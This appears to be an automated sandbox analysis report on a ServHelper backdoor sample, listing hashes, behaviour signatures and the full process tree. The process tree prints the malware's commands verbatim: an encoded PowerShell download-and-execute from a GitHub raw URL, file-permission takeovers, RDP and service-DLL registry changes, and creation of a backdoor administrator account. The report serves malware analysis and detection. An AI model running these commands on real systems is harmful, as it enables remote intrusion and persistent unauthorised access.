Analysis
-
max time kernel
122s -
max time network
56s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
21-07-2021 08:34
Static task
static1
Behavioral task
behavioral1
Sample
exe1.bin.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
exe1.bin.exe
Resource
win10v20210408
General
-
Target
exe1.bin.exe
-
Size
4.6MB
-
MD5
eaee663dfeb2efcd9ec669f5622858e2
-
SHA1
2b96f0d568128240d0c53b2a191467fde440fd93
-
SHA256
6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2
-
SHA512
211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 10 572 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
icacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 400 icacls.exe 1992 icacls.exe 1096 takeown.exe 1512 icacls.exe 1376 icacls.exe 640 icacls.exe 1400 icacls.exe 1680 icacls.exe -
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 2 IoCs
Processes:
pid process 640 640 -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
takeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 1096 takeown.exe 1512 icacls.exe 1376 icacls.exe 640 icacls.exe 1400 icacls.exe 1680 icacls.exe 400 icacls.exe 1992 icacls.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Drops file in Windows directory 21 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f42944ec-9aba-4155-b2e5-50cb54a22111 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c98d4041-b55c-4eb1-9792-558893ba0c0b powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_726981a4-5076-485d-b7ff-0fb44911cbad powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0e809173-61d3-412d-ac6e-9fbd5f4b78a8 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a16d5b34-517d-48eb-9f3a-1a1024b8c14b powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_96372b89-a098-4f02-ab16-8a2539735215 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5c30dd62-adb6-4135-9aa7-86711b61059a powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4ZDVNZDF6ALCEJUAZG0H.temp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3796fa19-1610-4298-9379-36101e4a987c powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3a7b921b-8d1c-4a5e-b409-adefc2f95789 powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1a56b47a-1b63-462e-a2fb-fb7874dcc10e powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9797b473-f1df-4617-bcdd-d9bd4c03daa9 powershell.exe -
Modifies data under HKEY_USERS 4 IoCs
Processes:
WMIC.exeWMIC.exepowershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = c0834cbe0b7ed701 powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 756 powershell.exe 756 powershell.exe 544 powershell.exe 544 powershell.exe 1372 powershell.exe 1372 powershell.exe 1104 powershell.exe 1104 powershell.exe 756 powershell.exe 756 powershell.exe 756 powershell.exe 572 powershell.exe 572 powershell.exe -
Suspicious behavior: LoadsDriver 5 IoCs
Processes:
pid process 472 640 640 640 640 -
Suspicious use of AdjustPrivilegeToken 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exedescription pid process Token: SeDebugPrivilege 756 powershell.exe Token: SeDebugPrivilege 544 powershell.exe Token: SeDebugPrivilege 1372 powershell.exe Token: SeDebugPrivilege 1104 powershell.exe Token: SeRestorePrivilege 1376 icacls.exe Token: SeAssignPrimaryTokenPrivilege 1984 WMIC.exe Token: SeIncreaseQuotaPrivilege 1984 WMIC.exe Token: SeAuditPrivilege 1984 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1984 WMIC.exe Token: SeIncreaseQuotaPrivilege 1984 WMIC.exe Token: SeAuditPrivilege 1984 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 836 WMIC.exe Token: SeIncreaseQuotaPrivilege 836 WMIC.exe Token: SeAuditPrivilege 836 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 836 WMIC.exe Token: SeIncreaseQuotaPrivilege 836 WMIC.exe Token: SeAuditPrivilege 836 WMIC.exe Token: SeDebugPrivilege 572 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
exe1.bin.exepowershell.execsc.exenet.execmd.execmd.exedescription pid process target process PID 2040 wrote to memory of 756 2040 exe1.bin.exe powershell.exe PID 2040 wrote to memory of 756 2040 exe1.bin.exe powershell.exe PID 2040 wrote to memory of 756 2040 exe1.bin.exe powershell.exe PID 756 wrote to memory of 584 756 powershell.exe csc.exe PID 756 wrote to memory of 584 756 powershell.exe csc.exe PID 756 wrote to memory of 584 756 powershell.exe csc.exe PID 584 wrote to memory of 972 584 csc.exe cvtres.exe PID 584 wrote to memory of 972 584 csc.exe cvtres.exe PID 584 wrote to memory of 972 584 csc.exe cvtres.exe PID 756 wrote to memory of 544 756 powershell.exe powershell.exe PID 756 wrote to memory of 544 756 powershell.exe powershell.exe PID 756 wrote to memory of 544 756 powershell.exe powershell.exe PID 756 wrote to memory of 1372 756 powershell.exe powershell.exe PID 756 wrote to memory of 1372 756 powershell.exe powershell.exe PID 756 wrote to memory of 1372 756 powershell.exe powershell.exe PID 756 wrote to memory of 1104 756 powershell.exe powershell.exe PID 756 wrote to memory of 1104 756 powershell.exe powershell.exe PID 756 wrote to memory of 1104 756 powershell.exe powershell.exe PID 756 wrote to memory of 1096 756 powershell.exe takeown.exe PID 756 wrote to memory of 1096 756 powershell.exe takeown.exe PID 756 wrote to memory of 1096 756 powershell.exe takeown.exe PID 756 wrote to memory of 1512 756 powershell.exe icacls.exe PID 756 wrote to memory of 1512 756 powershell.exe icacls.exe PID 756 wrote to memory of 1512 756 powershell.exe icacls.exe PID 756 wrote to memory of 1376 756 powershell.exe icacls.exe PID 756 wrote to memory of 1376 756 powershell.exe icacls.exe PID 756 wrote to memory of 1376 756 powershell.exe icacls.exe PID 756 wrote to memory of 640 756 powershell.exe icacls.exe PID 756 wrote to memory of 640 756 powershell.exe icacls.exe PID 756 wrote to memory of 640 756 powershell.exe icacls.exe PID 756 wrote to memory of 1400 756 powershell.exe icacls.exe PID 756 wrote to memory of 1400 756 powershell.exe icacls.exe PID 756 wrote to memory of 1400 756 powershell.exe icacls.exe PID 756 wrote to memory of 1680 756 powershell.exe icacls.exe PID 756 wrote to memory of 1680 756 powershell.exe icacls.exe PID 756 wrote to memory of 1680 756 powershell.exe icacls.exe PID 756 wrote to memory of 400 756 powershell.exe icacls.exe PID 756 wrote to memory of 400 756 powershell.exe icacls.exe PID 756 wrote to memory of 400 756 powershell.exe icacls.exe PID 756 wrote to memory of 1992 756 powershell.exe icacls.exe PID 756 wrote to memory of 1992 756 powershell.exe icacls.exe PID 756 wrote to memory of 1992 756 powershell.exe icacls.exe PID 756 wrote to memory of 572 756 powershell.exe reg.exe PID 756 wrote to memory of 572 756 powershell.exe reg.exe PID 756 wrote to memory of 572 756 powershell.exe reg.exe PID 756 wrote to memory of 1668 756 powershell.exe reg.exe PID 756 wrote to memory of 1668 756 powershell.exe reg.exe PID 756 wrote to memory of 1668 756 powershell.exe reg.exe PID 756 wrote to memory of 1788 756 powershell.exe reg.exe PID 756 wrote to memory of 1788 756 powershell.exe reg.exe PID 756 wrote to memory of 1788 756 powershell.exe reg.exe PID 756 wrote to memory of 820 756 powershell.exe net.exe PID 756 wrote to memory of 820 756 powershell.exe net.exe PID 756 wrote to memory of 820 756 powershell.exe net.exe PID 820 wrote to memory of 1984 820 net.exe net1.exe PID 820 wrote to memory of 1984 820 net.exe net1.exe PID 820 wrote to memory of 1984 820 net.exe net1.exe PID 756 wrote to memory of 1660 756 powershell.exe cmd.exe PID 756 wrote to memory of 1660 756 powershell.exe cmd.exe PID 756 wrote to memory of 1660 756 powershell.exe cmd.exe PID 1660 wrote to memory of 1588 1660 cmd.exe cmd.exe PID 1660 wrote to memory of 1588 1660 cmd.exe cmd.exe PID 1660 wrote to memory of 1588 1660 cmd.exe cmd.exe PID 1588 wrote to memory of 1360 1588 cmd.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\exe1.bin.exe"C:\Users\Admin\AppData\Local\Temp\exe1.bin.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:756 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tallksh0\tallksh0.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:584 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3F13.tmp" "c:\Users\Admin\AppData\Local\Temp\tallksh0\CSC262750DE54D448CAA53F6412757B70.TMP"4⤵PID:972
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:544 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1372 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1104 -
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1096 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1512 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1376 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:640 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1400 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1680 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:400 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1992 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:572
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:1668 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:1788
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:820 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:1984
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:1660 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:1588 -
C:\Windows\system32\net.exenet start rdpdr5⤵PID:1360
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:1608
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵PID:1892
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵PID:584
-
C:\Windows\system32\net.exenet start TermService5⤵PID:1336
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:348
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:1336
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:1984
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵PID:400
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵PID:572
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:1668
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc MIhLLINc /add1⤵PID:804
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc MIhLLINc /add2⤵PID:1776
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc MIhLLINc /add3⤵PID:1408
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵PID:1588
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵PID:1156
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:1084
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD1⤵PID:572
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD2⤵PID:1668
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD3⤵PID:1996
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵PID:1776
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵PID:1504
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:1340
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc MIhLLINc1⤵PID:1156
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc MIhLLINc2⤵PID:1660
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc MIhLLINc3⤵PID:976
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵PID:1996
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1984
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:1104
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:836
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:1760
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:860
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:572
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_04f18f7f-3b97-4bc8-9146-5e14447d8e53
MD5a70ee38af4bb2b5ed3eeb7cbd1a12fa3
SHA181dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9
SHA256dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d
SHA5128c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7f4f8776-5487-493b-9dd5-b76db0f0819e
MD56f0d509e28be1af95ba237d4f43adab4
SHA1c665febe79e435843553bee86a6cea731ce6c5e4
SHA256f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e
SHA5128dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8d03b543-8a06-4ae1-ad34-8286e6ffff8a
MD5e5b3ba61c3cf07deda462c9b27eb4166
SHA1b324dad73048be6e27467315f82b7a5c1438a1f9
SHA256b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925
SHA512a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_93b6eda3-c3c1-4646-8d99-2b4c84077260
MD57f79b990cb5ed648f9e583fe35527aa7
SHA171b177b48c8bd745ef02c2affad79ca222da7c33
SHA256080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683
SHA51220926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_93dc227d-1fdc-4b9d-a203-575cc8cfd92c
MD5d89968acfbd0cd60b51df04860d99896
SHA1b3c29916ccb81ce98f95bbf3aa8a73de16298b29
SHA2561020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9
SHA512b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f63440fb-74fd-4d5e-9f5a-833bc8258449
MD5faa37917b36371249ac9fcf93317bf97
SHA1a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4
SHA256b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132
SHA512614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f6c92169-c3a2-4674-a0a5-13164ee2b56d
MD52d5cd190b5db0620cd62e3cd6ba1dcd3
SHA1ff4f229f4fbacccdf11d98c04ba756bda80aac7a
SHA256ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d
SHA512edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD53ca3e1d5b170e8308f047c44036582f9
SHA1ea304667d97806c80c8f2e16d410ffb456d051f0
SHA256ae271465142a4a21b130fd414f78ac701dee1ff1416b43c4e002587f9588102c
SHA512cba3cbc44192c13745f1889d9e0e8f258c76620a1e3707e2d14be6e234233c69735c885ed36111c420277497cfdcdf4546a5e05d5e8888102bb82d188fc8d62e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD50092f959c818b70d837b8f9791b5d710
SHA1ecb9ea8ac4d519b57de56b243a05d7cbf3761f18
SHA256fc0e7215d52c669aa5b7ae73dfba329f589aec173a334ba5225d00322dcab39a
SHA512d0973c256088c2ed7f7048699f67ba45176a4c375868f4e36cf0d84070039da6bc752e16fa31176399492c272d38dd8c22a8d06c3e710f92a74b21185b9d5412
-
MD5
151e03e4108a8d61858eb3e34b160cdf
SHA1aae4fd099120670b51d2c12c4a36ba7e8b3557f0
SHA2561d9113104323a75161be03af4b25fa7bcf36eaa3a08fce65ecc6ced3daa19f36
SHA512028d20ad50bb084ef705da5427f424809083553d684805e989cb21bbf76f248a43d3a7f60a77f75423fe697b0fba84251a398e3cddc78d680e2bf408309d266c
-
MD5
3447df88de7128bdc34942334b2fab98
SHA1519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA2569520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA5122ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
-
MD5
43473f4e719958639a9d89e5d8388999
SHA1ccb79eb606a23daa4b3ff8f996a2fbf281f31491
SHA256ce84b142a2983e1f60b3051cbff38153424a016178ce3fcf703e3694eb474734
SHA5121051092c5eae13758e8e01086907effc5c603cc1f9456fb2cdb951cb4b196c5c3d089ffd2e981b5d6731b0e6b24402fb2808a20f66ac6dcb1704a8f4b457b1fa
-
MD5
b7fbdfe9467b30f52695c666002b6f36
SHA159169bf3b5a57de31cc5287daaef45a34b49a7f9
SHA2564af5c4d9b5b77f036a54fa865a14ef7a1edc166365c6dd277c12142cb3b1bd7a
SHA512fa4b87c4047b514fffb3f265c27af5e538eae1d2f8f1c3641ac7727c7b466ed66721cd341e86a272c253275838367b588de4757891f6592e19f3c2efb15a4e1f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD551cab376af0bb2f741e471cf5a65c472
SHA1e9a56507e69806cd9de5ca2ef35ee615582d8340
SHA256ff37b451241f46854216aca8e74d1f869de0e280d231edc4c15aa17ba15e8c3d
SHA512ed6d012a139d1fe202a8afadac00ec3c38b9ea918b168a5c96ac8cc379b9ebd6c11dfebad3489282b2a1a3a9fdf739318a74918497b4ed1499217dbd68ff7e00
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD551cab376af0bb2f741e471cf5a65c472
SHA1e9a56507e69806cd9de5ca2ef35ee615582d8340
SHA256ff37b451241f46854216aca8e74d1f869de0e280d231edc4c15aa17ba15e8c3d
SHA512ed6d012a139d1fe202a8afadac00ec3c38b9ea918b168a5c96ac8cc379b9ebd6c11dfebad3489282b2a1a3a9fdf739318a74918497b4ed1499217dbd68ff7e00
-
